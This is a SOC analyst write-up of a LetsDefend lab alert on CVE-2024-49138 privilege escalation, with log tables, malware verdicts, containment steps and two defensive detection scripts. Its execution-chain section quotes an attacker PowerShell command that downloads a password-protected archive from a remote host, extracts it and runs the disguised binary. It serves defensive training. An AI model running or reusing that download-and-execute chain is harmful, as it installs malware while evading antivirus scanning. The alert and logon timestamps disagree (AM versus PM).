# LetsDefend SOC335 – CVE-2024-49138 Privilege Escalation Exploitation Analysis
Alert Name: SOC335 – CVE-2024-49138 Exploitation Detected
Severity: High
Event ID: 313
Event Time: Jan 22, 2025, 02:37 AM
Category: Privilege Escalation
## Base Information
| Field | Value |
|---|---|
| Event ID | 313 |
| Event Time | Jan 22, 2025, 02:37 AM |
| Rule | SOC335 – CVE-2024-49138 Exploitation Detected |
| Analyst Level | Security Analyst |
| Hostname | Victor |
| IP Address | 172.16.17.207 |
| Process Name | svohost.exe |
| Process Path | C:\temp\service_installer\svohost.exe |
| Process ID | 7640 |
| Parent Process | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| Command Line | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
| File Hash (SHA-256) | b432dcf4a0f0b601b1d79848467137a5e25cab5a0b7b1224be9d3b6540122db9 |
| Process User | EC2AMAZ-ILGVOIN\LetsDefend |
| Trigger Reason | Suspicious behavior patterns linked to CVE-2024-49138 |
| Device Action | Allowed |
## Incident Details
| Field | Value |
|---|---|
| Incident Name | EventID 313 – SOC335 CVE-2024-49138 Exploitation |
| Incident Type | Privilege Escalation |
| Created Date | Jan 08, 2026, 09:12 AM |
## Pre-Investigation Notes
- Date: Jan 22, 2025, 02:37 AM
- Hostname: Victor
- IP Address: 172.16.17.207
- Process Name: svohost.exe
- Process ID: 7640
- File Hash: b432dcf4a0f0b601b1d79848467137a5e25cab5a0b7b1224be9d3b6540122db9
- User: EC2AMAZ-ILGVOIN\LetsDefend
## Play Book
The process name is suspicious because it closely mimics svchost.exe by replacing one character, a common masquerading technique used by malware to blend in with legitimate Windows processes.
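The masquerading check described above, as an added example that is not part of the alert data: it compares an observed image name with a short allowlist of legitimate Windows binaries by edit distance, and verifies that a known name runs from its expected directory. The allowlist and expected paths are constructed for illustration.

```python
"""Flag process names that masquerade as Windows system binaries.

Added example, not part of the alert data: compares an observed image
name with a short allowlist of legitimate names by edit distance and
checks that known names run from their expected directory.
"""
import ntpath

# Legitimate binaries and the directory each should run from (constructed,
# deliberately short; build the real list from your own golden image).
EXPECTED_DIRS = {
    "svchost.exe": r"c:\windows\system32",
    "conhost.exe": r"c:\windows\system32",
    "lsass.exe": r"c:\windows\system32",
    "csrss.exe": r"c:\windows\system32",
    "explorer.exe": r"c:\windows",
}


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance using a single rolling row."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_process(image_path: str, max_distance: int = 1) -> list:
    """Return findings for one process image path; an empty list means clean."""
    directory, name = ntpath.split(image_path.lower())
    expected = EXPECTED_DIRS.get(name)
    if expected is not None:
        # Exact legitimate name: only the location can be wrong.
        if directory != expected:
            return [f"{name} ran from {directory}, expected {expected}"]
        return []
    # Unknown name: look for a legitimate name a few edits away (svohost/svchost).
    return [
        f"{name} is within {max_distance} edit(s) of {legit} (possible masquerade)"
        for legit in EXPECTED_DIRS
        if edit_distance(name, legit) <= max_distance
    ]


if __name__ == "__main__":
    for finding in check_process(r"C:\temp\service_installer\svohost.exe"):
        print(finding)
```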
Check if the malware is quarantined or cleaned
| Field | Value |
|---|---|
| Type | OS |
| Source Address | 185.107.56.141 |
| Source Port | 0 |
| Destination Address | 172.16.17.207 |
| Destination Port | 0 |
| Time | Jan 22, 2025, 02:35 PM |
| Username | Victor |
| Event ID | 4624 |
| Logon Type | 10 (RemoteInteractive) |
| Source IP | 185.107.56.141 |
## Malware Analysis
VirusTotal analysis confirms the file is highly suspicious based on community detections and behavioral indicators.
- YARA signature match (THOR APT Scanner)
  - Rule: SUSP_HKTL_Gen_Pattern_Feb25_2
  - Rule set: Livehunt – Hacktools Indicators
  - Description: Generic hacktool behavior pattern
- Detection ratio: 51 / 74 engines
Hybrid Analysis reports indicate the executable behaves like a service installer abuse tool commonly used during privilege escalation attacks.
## Command and Control Activity Review
Multiple failed authentication attempts were observed from the same external IP address shortly before access succeeded.
Failed Login Attempts (Event ID 4625)
| Time | Username | Source IP | Destination IP | Error Code | Description |
|---|---|---|---|---|---|
| Jan 22, 2025, 02:35 PM | admin | 185.107.56.141 | 172.16.17.207 | 0xC000006D | Invalid credentials |
| Jan 22, 2025, 02:35 PM | admin | 185.107.56.141 | 172.16.17.207 | 0xC000006D | Invalid credentials |
| Jan 22, 2025, 02:35 PM | guest | 185.107.56.141 | 172.16.17.207 | 0xC000006D | Invalid credentials |
| Jan 22, 2025, 02:35 PM | guest | 185.107.56.141 | 172.16.17.207 | 0xC000006D | Invalid credentials |
Successful Login (Event ID 4624)
| Time | Username | Source IP | Destination IP | Logon Type | Description |
|---|---|---|---|---|---|
| Jan 22, 2025, 02:35 PM | Victor | 185.107.56.141 | 172.16.17.207 | 10 | Successful RDP login |
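The failed-then-successful logon pattern in the two tables above, turned into detection logic as an added example (not part of the LetsDefend case data). The events are constructed to mirror the 4625/4624 rows; second-level timestamps and the benign internal logon are assumptions, since the tables only give minute resolution.

```python
"""Correlate failed-logon bursts with a later remote logon from the same IP.

Added example, not from the LetsDefend case data: the events are
constructed to mirror the 4625/4624 rows above; second-level timestamps
are assumed because the tables only give minute resolution.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SRC = "185.107.56.141"
# Constructed, simplified Security-log records (time, event id, target user, source, logon type).
EVENTS = [
    {"time": "2025-01-22T14:35:02", "id": 4625, "user": "admin", "src": SRC, "logon_type": 10},
    {"time": "2025-01-22T14:35:05", "id": 4625, "user": "admin", "src": SRC, "logon_type": 10},
    {"time": "2025-01-22T14:35:09", "id": 4625, "user": "guest", "src": SRC, "logon_type": 10},
    {"time": "2025-01-22T14:35:12", "id": 4625, "user": "guest", "src": SRC, "logon_type": 10},
    {"time": "2025-01-22T14:35:41", "id": 4624, "user": "Victor", "src": SRC, "logon_type": 10},
    # Assumed benign console logon earlier in the day from an internal address.
    {"time": "2025-01-22T09:00:00", "id": 4624, "user": "Victor", "src": "172.16.17.10", "logon_type": 2},
]


def find_spray_then_success(events, min_failures=3, window=timedelta(minutes=10)):
    """Return one alert per remote logon (type 3 or 10) preceded, within `window`,
    by at least `min_failures` 4625 events from the same source address."""
    by_src = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):  # ISO strings sort chronologically
        by_src[ev["src"]].append(ev)
    alerts = []
    for src, evs in by_src.items():
        for i, ev in enumerate(evs):
            if ev["id"] != 4624 or ev["logon_type"] not in (3, 10):
                continue
            t = datetime.fromisoformat(ev["time"])
            fails = [f for f in evs[:i]
                     if f["id"] == 4625 and t - datetime.fromisoformat(f["time"]) <= window]
            if len(fails) >= min_failures:
                alerts.append({
                    "src": src, "success_user": ev["user"], "failures": len(fails),
                    "users_tried": sorted({f["user"] for f in fails}),
                    "success_time": ev["time"],
                })
    return alerts


if __name__ == "__main__":
    for alert in find_spray_then_success(EVENTS):
        print(alert)
```

The alert also surfaces that the guessed accounts (admin, guest) differ from the account that finally succeeded (Victor), which is worth checking against a credential reset.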

## Containment Actions
- User account was contained for further investigation
- Host activity monitoring was enabled
- Malicious process execution was blocked
### Observed Execution Chain
powershell.exe downloaded and extracted a password-protected archive and executed the masqueraded binary from a temporary directory.
PowerShell command used:

```powershell
$url = 'https://files-ld.s3.us-east-2.amazonaws.com/service-installer.zip'
$dest = 'C:\temp\service-installer.zip'
$extractPath = 'C:\temp'
$password = 'infected'
Invoke-WebRequest -Uri $url -OutFile $dest
7z.exe x -pinfected -oC:\temp service-installer.zip
C:\temp\service_installer\svohost.exe
```
- Defines the download URL: `$url` points to a ZIP file hosted online (service-installer.zip).
- Sets where the file will be saved: `$dest` is the local path the ZIP is written to, `C:\temp\service-installer.zip`.
- Defines the extraction directory: `$extractPath` is set to `C:\temp`, where the contents of the ZIP will be unpacked.
- Defines the ZIP password: `$password = 'infected'`. Password-protected ZIP files are commonly used to evade antivirus scanning during download.
- Downloads the ZIP file: `Invoke-WebRequest -Uri $url -OutFile $dest` pulls the archive from the remote server and saves it locally.
- Extracts the ZIP using 7-Zip: `7z.exe x -pinfected -oC:\temp service-installer.zip`, where `x` extracts files, `-pinfected` supplies the password and `-oC:\temp` sets the output directory. This unpacks the archive into `C:\temp`. Note that this line hard-codes the password and output directory instead of reusing `$password` and `$extractPath`.
- Executes the extracted binary: `C:\temp\service_installer\svohost.exe` runs the executable directly after extraction.
## Impact Assessment
- Privilege escalation: Confirmed
- Host compromise: Partial
- Persistence risk: High
- Lateral movement: Not observed
- Data exposure: Unknown
## Recommended Actions
- Immediately isolate the affected endpoint
- Reset credentials associated with the compromised user
- Remove all artifacts related to the malicious installer
- Patch systems vulnerable to CVE-2024-49138
- Enable enhanced logging and EDR protections
- Monitor for similar masquerading techniques across the environment
## Final Verdict
True Positive – Confirmed Privilege Escalation Exploitation
The alert represents a successful exploitation attempt leveraging a disguised service binary associated with CVE-2024-49138. Immediate remediation and system hardening are required.
## Analyst Note
The investigation confirmed the execution of a malicious binary impersonating a legitimate Windows service process. The activity originated from an external IP address, involved multiple failed authentication attempts, and resulted in a successful RDP login followed by malicious process execution. Evidence supports a confirmed privilege escalation scenario with a high risk of persistence if not remediated.
